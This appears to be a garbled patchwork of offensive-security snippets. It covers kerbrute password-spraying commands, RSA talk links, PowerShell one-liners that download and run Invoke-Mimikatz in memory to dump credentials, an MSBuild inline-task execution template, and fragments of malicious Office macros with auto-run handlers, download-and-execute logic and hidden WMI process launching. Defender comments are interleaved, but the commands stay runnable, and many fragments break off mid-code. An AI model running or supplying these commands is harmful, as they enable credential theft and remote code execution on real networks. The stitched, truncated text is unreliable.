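With kerbrute.py (every wrong guess is a failed Kerberos pre-authentication against the domain controller, so it counts toward the account lockout threshold and is logged there as event 4771 when Kerberos auditing is enabled):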
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With a Rubeus build that includes the brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
RSA 2017 DevOOPS: Attacks And Defenses For DevOps Toolchains — Talk Links (SessionID: HTA-W02)
https://www.slideshare.net/chrisgates/devoops-attacks-and-defenses-for-devops-toolchains
Recording of the talk from CERN:
https://indico.cern.ch/event/622483/ (click the recording button)
Past talks:
http://www.slideshare.net/KenJohnson61/aws-surival-guide
# Each command below starts powershell.exe with the execution policy bypassed,
# fetches a script from the master branch of a GitHub repository with
# Net.WebClient.DownloadString, and passes the returned text straight to IEX,
# so the script runs without these commands writing it to disk.
# Defender notes: the whole command line (-exec bypass, DownloadString, IEX) is
# visible in process-creation logging, and PowerShell script block logging
# (event ID 4104) records the downloaded script text when it is enabled.
# The URLs name a branch, not a commit, and nothing verifies the download, so
# whatever the remote branch holds at that moment is what executes.
#
# Invoke-Mimikatz: Dump credentials from memory
# Loads the script and calls Invoke-Mimikatz -DumpCreds in the same process.
# Credential Guard and LSA protection (RunAsPPL) are the usual hardening
# against this kind of credential read.
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
# Import Invoke-Mimikatz
# Same download, but nothing is invoked; -noexit keeps the session open after
# the script has been loaded.
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')" | |
# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
# The host name is piped into Invoke-MassMimikatz; how that script reaches the
# remote host is not visible here.
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose" | |
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] |
function Compress-Data | |
{ | |
<# | |
.Synopsis | |
Compresses data | |
.Description | |
Compresses data into a GZipStream | |
.Link | |
Expand-Data | |
.Link |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- Pass xml to msbuild for compile and execution --> | |
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild filepath\filename.xlm --> | |
<!-- Configure AssemblyFile and pok for that to work --> | |
<Target Name="34rfas"> | |
<QWEridxnaPO /> | |
</Target> | |
<UsingTask | |
TaskName="QWEridxnaPO" | |
TaskFactory="CodeTaskFactory" |
//sample: 1554e74b935a61d446cb634f80d7d1e200e864bc | |
//posted by @JohnLaTwC | |
// Also see research by Sudeep Singh, Yin Hong Chang @ https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html | |
----------------------------------------------- macro ---------------------------------- | |
Private Sub Workbook_Open()
    ' Excel raises this event when the workbook is opened with macros enabled.
    ' The handler only runs the two doom_* routines, in this order; both are
    ' defined outside this excerpt.
    doom_Init
    doom_ShowHideSheets
End Sub
' Original author's note: get OS, if NT, else if OS X.
' Binds the C library function system() from libc.dylib, so VBA code can pass
' it a command string and receive a Long result.
' NOTE(review): a Declare against libc.dylib inside an Office document is a
' useful triage signal, since it gives the macro a route to run commands on
' macOS. How the macro chooses the platform is not visible in this excerpt.
Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long | |
' A Base64 Encoder/Decoder. | |
' | |
' This module is used to encode and decode data in Base64 format as described in RFC 1521. | |
' | |
' Home page: www.source-code.biz. | |
' License: GNU/LGPL (www.gnu.org/licenses/lgpl.html). | |
' Copyright 2007: Christian d'Heureuse, Inventec Informatik AG, Switzerland. |
Function CSV_Import(strFile)
    ' Loads the comma-delimited text file named by strFile into "Sheet1" of the
    ' active workbook, starting at cell A1, through a TEXT query table.
    ' No return value is ever assigned to the function name.
    ' NOTE(review): the file is loaded as-is with no validation of strFile or
    ' of the cell contents. Confirm that callers only pass trusted files.
    Dim targetSheet As Worksheet
    Dim csvQuery As QueryTable

    Set targetSheet = ActiveWorkbook.Sheets("Sheet1")
    Set csvQuery = targetSheet.QueryTables.Add( _
        Connection:="TEXT;" & strFile, _
        Destination:=targetSheet.Range("A1"))

    csvQuery.TextFileParseType = xlDelimited
    csvQuery.TextFileCommaDelimiter = True
    csvQuery.Refresh

    ' Flag the workbook as saved so that Excel does not prompt to save the
    ' imported data on close.
    ActiveWorkbook.Saved = True
End Function
Sub DownloadAndExec() | |
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP") | |
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream") | |
xHttp.Open "GET", "https://trusted.domain/encoded.crt", False | |
xHttp.Send | |
With bStrm | |
.Type = 1 '//binary | |
.Open |
Sub InkEdit1_GotFocus()
    ' Handler for the GotFocus event of the InkEdit1 control. Its only action
    ' is to invoke Debugging and discard the result.
    ' NOTE(review): presumably the control event is the trigger here in place
    ' of a Workbook_Open/AutoOpen handler. Confirm against the full document.
    Call Debugging
End Sub
Public Function Debugging() As Variant | |
Const HIDDEN_WINDOW = 0 | |
strComputer = "." | |
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") | |
Set objStartup = objWMIService.Get("Win32_ProcessStartup") | |
Set objConfig = objStartup.SpawnInstance_ |